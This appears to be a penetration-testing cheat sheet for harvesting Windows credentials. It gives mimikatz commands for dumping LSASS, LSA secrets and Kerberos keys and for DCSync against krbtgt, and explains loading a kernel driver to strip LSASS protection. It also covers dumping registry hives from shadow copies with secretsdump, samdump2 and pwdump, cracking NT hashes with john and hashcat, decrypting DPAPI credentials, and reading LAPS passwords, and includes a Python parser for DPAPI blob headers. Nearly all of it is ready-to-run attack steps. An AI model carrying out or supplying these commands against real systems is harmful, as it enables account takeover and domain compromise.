privilege::debug //acquire SeDebugPrivilege, needed to open a handle to LSASS
token::elevate //impersonate SYSTEM, needed for lsadump::* on the local machine and for SYSTEM DPAPI keys
lsadump::lsa /inject /name:<user> //NTLM hash (and Kerberos keys) of one account read from the LSA; /patch instead dumps every account
lsadump::dcsync /user:krbtgt //hashes of the given domain account replicated from a DC; needs directory replication rights (Domain Admins have them by default)
sekurlsa::logonpasswords //NTLM and SHA1 hashes of every logon session in LSASS memory (plaintext too where wdigest caching is enabled)
sekurlsa::credman //Credential Manager entries held in LSASS memory
sekurlsa::ekeys /aes128 //Kerberos encryption keys of the logon sessions
sekurlsa::ekeys /aes256 //Kerberos encryption keys of the logon sessions
vault::cred //Credential Manager credentials; add /patch to get them in plaintext
vault::list //enumerate the Windows Vaults and their entries
If sekurlsa::logonpasswords fails with ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005), the handle to LSASS was refused (0x5 is ERROR_ACCESS_DENIED), which on current systems usually means LSASS runs as a Protected Process Light (RunAsPPL). Download the mimikatz driver (mimidrv.sys) for the right architecture from (Win32) or (Win64) into the same folder as the mimikatz executable and use mimikatz's driver commands to load it and strip the protection from lsass.exe. This needs admin rights, loads a kernel driver (recorded as a driver load and flagged by most EDR products) and does not help against Credential Guard, which keeps the secrets outside LSASS entirely.
Hashes and keys can also be recovered from Volume Shadow Copies: a shadow copy exposes the registry hives (SAM, SYSTEM, SECURITY) of the running system without the file locks, so they can be copied out and dumped offline. SAM plus SYSTEM yields the local account NT hashes; SECURITY adds the LSA secrets (service account passwords, the DPAPI_SYSTEM key, cached domain logons). Everything below requires local admin privileges.
secretsdump.py -sam <sam file> -system <system file> LOCAL #local account hashes; SYSTEM supplies the boot key that decrypts the SAM
secretsdump.py -sam <sam file> -system <system file> -security <sec file> LOCAL #additionally LSA secrets, DPAPI_SYSTEM and cached domain logons (DCC2, hashcat -m 2100)
Samdump or Pwdump
samdump2 system.save sam.save
pwdump SYSTEM SAM > <file>
Once obtained, the hashes can be cracked to recover the passwords or used as they are in Pass-the-Hash attacks. For cracking only the NT half matters: an entry of the form AAAA:BBBB is LM:NT, and the string to bruteforce is the part to the right of the colon (in secretsdump output, user:rid:LM:NT:::, it is the fourth field; the LM value aad3b435b51404eeaad3b435b51404ee only means LM hashing is disabled).
john --format=NT --wordlist=<wordlist> <hashfile>
hashcat -m 1000 -a 0 --username <hashfile> <wordlist> #rows follow the format <user>:<hash>; --show does not crack, run hashcat -m 1000 --username --show <hashfile> afterwards to print the cracked pairs from the potfile
Enumerate the DPAPI-protected credential blobs (e.g. the files under %APPDATA%\Microsoft\Credentials\). The guidMasterKey field in the output is the GUID of the master key that protects the blob, i.e. the name of the file to decrypt under %APPDATA%\Microsoft\Protect\<SID>\
dpapi::cred /in:"<path to cred hash>"
Decrypt the master key and keep it in mimikatz's key cache. The master key file is encrypted with a key derived from its owner's password, so decrypting it in place works only from the context (user, or SYSTEM for machine keys) the key belongs to; /rpc instead asks a domain controller to unwrap it with the domain DPAPI backup key, which works for a domain user from that user's own session.
dpapi::masterkey /in:"<Path to MasterKeyGUID>"
dpapi::masterkey /in:"<Path to MasterKeyGUID>" /rpc
dpapi::cache //list the master keys currently cached
With the master key cached, decrypt the credential blobs it protects (mimikatz picks the matching key from the cache)
dpapi::cred /in:"<path to CredHash>"
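As an added example (not from the original notes or from mimikatz), the parser below reads the masterkey GUID out of a DPAPI blob, which is the guidMasterKey value dpapi::cred prints, so the right file under %APPDATA%\Microsoft\Protect\<SID>\ can be handed to dpapi::masterkey. It parses only the fixed blob header (version, provider GUID, master key version, master key GUID, flags, description), as documented by public DPAPI parsers; the ciphertext itself needs the master key. The sample file, the SID, the GUID and the 12-byte container header in front of the blob are constructed for the example.

```python
# Added example (not from the original page): extract guidMasterKey from a DPAPI blob.
import struct
import uuid

# Provider GUID that CryptProtectData writes at offset 4 of every blob.
DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")


def parse_dpapi_blob(data: bytes) -> dict:
    """Parse the DPAPI blob header. Credential files and other containers
    put their own header in front of the blob, so the blob is located by
    its provider GUID instead of being assumed to start at offset 0."""
    pos = data.find(DPAPI_PROVIDER.bytes_le)
    if pos < 4:
        raise ValueError("no DPAPI blob found")
    start = pos - 4                                   # 4-byte version precedes the GUID
    version, = struct.unpack_from("<I", data, start)
    mk_version, = struct.unpack_from("<I", data, start + 20)
    mk_guid = uuid.UUID(bytes_le=data[start + 24:start + 40])
    flags, desc_len = struct.unpack_from("<II", data, start + 40)
    desc_raw = data[start + 48:start + 48 + desc_len]  # UTF-16LE, NUL terminated
    return {
        "blob_offset": start,
        "version": version,
        "masterkey_version": mk_version,
        "masterkey_guid": str(mk_guid),               # lowercase, no braces: the file name
        "flags": flags,
        "description": desc_raw.decode("utf-16le").rstrip("\x00"),
    }


def masterkey_file(sid: str, masterkey_guid: str) -> str:
    """Path of the master key file that protects a blob with this GUID."""
    return rf"%APPDATA%\Microsoft\Protect\{sid}\{masterkey_guid}"


def build_sample_blob(masterkey_guid: str, description: str) -> bytes:
    """Constructed blob header (no ciphertext) so the parser can run offline."""
    desc = description.encode("utf-16le") + b"\x00\x00"
    return (struct.pack("<I", 1) + DPAPI_PROVIDER.bytes_le
            + struct.pack("<I", 1) + uuid.UUID(masterkey_guid).bytes_le
            + struct.pack("<II", 0, len(desc)) + desc)


# Constructed sample: a hypothetical 12-byte container header followed by
# the blob, with made-up SID and GUID values.
SAMPLE_SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"
SAMPLE_GUID = "8a1b2c3d-4e5f-4071-9a8b-0123456789ab"
SAMPLE_FILE = (b"\x01\x00\x00\x00" + b"\x00" * 8
               + build_sample_blob(SAMPLE_GUID, "Local Credential Data"))

if __name__ == "__main__":
    info = parse_dpapi_blob(SAMPLE_FILE)
    print(info)
    print(masterkey_file(SAMPLE_SID, info["masterkey_guid"]))
```

On a real file the SID in the path is the owner's; the Protect directory holds one subdirectory per SID, and the file whose name equals masterkey_guid is the one dpapi::masterkey has to decrypt before dpapi::cred can succeed.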
LAPS
Verify that LAPS is installed by checking for AdmPwd.dll, usually at C:\Program Files\LAPS\CSE\AdmPwd.dll
Check available commands in PowerShell
Get-Command *AdmPwd*
Find the groups allowed to read LAPS passwords. If the command, run with a wildcard as its identity argument, throws an exception after already returning one or more results, run it again passing one of the OUs returned the first time as the identity parameter
From the context of a user belonging to one of those groups, query the machine that has LAPS enabled to read its stored local administrator password. The password lives in the computer object's ms-Mcs-AdmPwd attribute, so any principal with read rights on that attribute can retrieve it, through the LAPS cmdlets or plain LDAP